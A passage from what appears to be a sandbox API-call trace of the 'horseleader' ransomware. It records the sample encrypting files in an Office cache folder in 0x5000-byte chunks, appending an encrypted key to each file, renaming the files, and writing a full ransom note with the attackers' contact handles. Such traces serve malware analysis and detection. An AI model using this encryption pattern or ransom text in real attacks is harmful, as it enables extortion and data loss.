Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.horseleader") returned 91 [0194.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.horseleader")) returned 1 [0194.293] GetProcessHeap () returned 0x780000 [0194.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0194.293] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0194.293] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0194.293] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0194.293] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0194.293] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0194.294] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0194.294] lstrlenW (lpString=".testttjffg") returned 11 [0194.294] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0194.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.294] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.294] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0194.294] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0194.295] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0194.295] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2362) returned 1 [0194.295] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x93a, lpOverlapped=0x0) returned 1 [0194.297] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.297] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x93a, lpOverlapped=0x0) returned 1 [0194.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.298] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0194.298] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0194.298] CloseHandle (hObject=0x21c) returned 1 [0194.314] GetProcessHeap () returned 0x780000 [0194.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0194.315] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0194.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0194.316] GetProcessHeap () returned 0x780000 [0194.316] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0194.316] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0194.316] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0194.316] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0194.316] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0194.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0194.316] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0194.318] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0194.318] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0194.318] CloseHandle (hObject=0x1cc) returned 1 [0194.319] GetProcessHeap () returned 0x780000 [0194.319] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0194.319] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0194.319] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0194.319] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 66 [0194.319] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0194.319] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0194.319] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0194.319] GetProcessHeap () returned 0x780000 [0194.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0194.319] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned 68 [0194.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0194.323] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0194.323] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0194.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0194.324] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0194.324] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0194.324] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0194.324] lstrlenW (lpString=".testttjffg") returned 11 [0194.324] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0194.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.324] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.325] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.325] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0194.325] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0194.325] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0194.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0194.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0194.326] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0194.326] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0194.326] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0194.326] lstrlenW (lpString=".testttjffg") returned 11 [0194.326] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0194.326] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.326] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.326] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.327] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0194.327] lstrcmpiW (lpString1="InfLR.cab", lpString2="Windows") returned -1 [0194.327] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0194.327] StrStrIW (lpFirst="InfLR.cab", lpSrch=".horseleader") returned 0x0 [0194.327] lstrcmpW (lpString1="InfLR.cab", lpString2="#Decrypt#.txt") returned 1 [0194.327] lstrcmpW (lpString1="InfLR.cab", lpString2="_uninstalling_.png") returned 1 [0194.327] lstrlenW (lpString=".testttjffg") returned 11 [0194.327] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".testttjffg") returned 0x0 [0194.328] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.328] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.328] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0194.328] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0194.328] StrStrW (lpFirst="InfLR.cab", lpSrch=".txt") returned 0x0 [0194.328] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=18874884) returned 1 [0194.329] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.329] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.732] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8fd902, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.799] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.800] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11fb204, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.800] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.804] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.806] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.806] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0194.806] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0194.808] CloseHandle (hObject=0x21c) returned 1 [0195.722] GetProcessHeap () returned 0x780000 [0195.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.722] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.horseleader") returned 88 [0195.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.horseleader")) returned 1 [0195.723] GetProcessHeap () returned 0x780000 [0195.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.723] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0195.723] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Windows") returned -1 [0195.723] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0195.725] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".horseleader") returned 0x0 [0195.725] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0195.725] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="_uninstalling_.png") returned 1 [0195.725] lstrlenW (lpString=".testttjffg") returned 11 [0195.725] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpSrch=".testttjffg") returned 0x0 [0195.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.725] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.726] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0195.726] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".txt") returned 0x0 [0195.726] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3124224) returned 1 [0195.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.726] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, 